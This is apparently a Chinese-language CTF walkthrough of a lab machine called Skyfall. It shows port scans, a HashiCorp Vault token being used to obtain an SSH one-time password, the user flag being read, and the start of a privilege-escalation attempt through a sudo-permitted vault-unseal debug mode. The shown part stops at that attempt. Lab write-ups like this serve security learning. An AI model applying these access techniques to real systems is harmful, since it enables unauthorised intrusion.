┌──(root㉿Desktop-Trtyr)-[~] └─# nmap -sT --min-rate 10000 -p- 10.10.11.254 Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:29 CST Warning: 10.10.11.254 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.11.254 Host is up (0.15s latency). Not shown: 58911 closed tcp ports (conn-refused), 6622 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 35.40 seconds
┌──(root㉿Desktop-Trtyr)-[~] └─# nmap -sTCV -O -p22,80 10.10.11.254 Starting Nmap 7.94SVN ( http://nmap.org ) at 2024-02-07 13:32 CST Nmap scan report for 10.10.11.254 Host is up (0.15s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 65:70:f7:12:47:07:3a:88:8e:27:e9:cb:44:5d:10:fb (ECDSA) |_ 256 74:48:33:07:b7:88:9d:32:0e:3b:ec:16:aa:b4:c8:fe (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-title: Skyfall - Introducing Sky Storage! |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.60 seconds
┌──(root㉿Desktop-Trtyr)-[~/Tools] └─# ./vault login Token (will be hidden): WARNING! The VAULT_TOKEN environment variable is set! The value of this variable will take precedence; if this is unwanted please unset VAULT_TOKEN or update its value accordingly.
Success! You are now authenticated. The token information displayed below is already stored in the token helper. You do NOT need to run "vault login" again. Future Vault requests will automatically use this token.
┌──(root㉿Desktop-Trtyr)-[~/Tools] └─# ./vault token capabilities ssh/roles list
┌──(root㉿Desktop-Trtyr)-[~/Tools] └─# ./vault list ssh/roles Keys ---- admin_otp_key_role dev_otp_key_role
现在我们可以尝试进行ssh登录
SSH登录
1 2 3 4 5 6 7
┌──(root㉿Desktop-Trtyr)-[~/Tools] └─# ./vault ssh -role dev_otp_key_role -mode OTP -strict-host-key-checking=no askyy@10.10.11.254 Vault could not locate "sshpass". The OTP code for the session is displayed below. Enter this code in the SSH password prompt. If you install sshpass, Vault can automatically perform this step for you. OTP for the session is: 140c780c-092d-01cb-5fc5-5fe6af8d9ab4 (askyy@10.10.11.254) Password:
askyy@skyfall:~$ ls user.txt askyy@skyfall:~$ cat user.txt 7555ee6e92f71aa2d74b02fc94f44f08
提权
查看可用权限
1 2 3 4 5 6 7
askyy@skyfall:~$ sudo -l Matching Defaults entries for askyy on skyfall: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User askyy may run the following commands on skyfall: (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml [-vhd]* (ALL : ALL) NOPASSWD: /root/vault/vault-unseal -c /etc/vault-unseal.yaml
这里有一些可用的命令
1 2 3 4 5 6 7 8 9 10 11 12
askyy@skyfall:~$ /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v -bash: /root/vault/vault-unseal: Permission denied askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v [+] Reading: /etc/vault-unseal.yaml [-] Security Risk! [-] Master token found in config: **************************** [>] Enable 'debug' mode for details [+] Found Vault node: http://prd23-vault-internal.skyfall.htb [>] Check interval: 5s [>] Max checks: 5 [>] Checking seal status [+] Vault sealed: false
发现一个token,但是需要开启debug模式才可以用
开启debug模式
创建一个debug日志文件
1
touch debug.txt
再次运行试试
1 2 3 4 5 6 7 8 9 10 11 12 13
askyy@skyfall:~$ touch debug.txt askyy@skyfall:~$ sudo /root/vault/vault-unseal -c /etc/vault-unseal.yaml -v [+] Reading: /etc/vault-unseal.yaml [-] Security Risk! [-] Master token found in config: **************************** [>] Enable 'debug' mode for details [+] Found Vault node: http://prd23-vault-internal.skyfall.htb [>] Check interval: 5s [>] Max checks: 5 [>] Checking seal status [+] Vault sealed: false askyy@skyfall:~$ cat debug.txt askyy@skyfall:~$
没生效……可能是权限问题?
1 2 3 4 5 6 7 8 9 10 11 12
askyy@skyfall:~$ ls -la total 32 drwxr-x--- 4 askyy askyy 4096 Feb 11 05:40 . drwxr-xr-x 3 root root 4096 Jan 19 21:33 .. lrwxrwxrwx 1 askyy askyy 9 Nov 9 21:30 .bash_history -> /dev/null -rw-r--r-- 1 askyy askyy 220 Jan 6 2022 .bash_logout -rw-r--r-- 1 askyy askyy 3771 Nov 9 21:30 .bashrc drwx------ 2 askyy askyy 4096 Oct 9 18:47 .cache -rw-r--r-- 1 askyy askyy 807 Jan 6 2022 .profile drwx------ 2 askyy askyy 4096 Jan 18 10:32 .ssh -rw-rw-r-- 1 askyy askyy 0 Feb 11 05:40 debug.txt -rw-r----- 1 root askyy 33 Feb 10 18:27 user.txt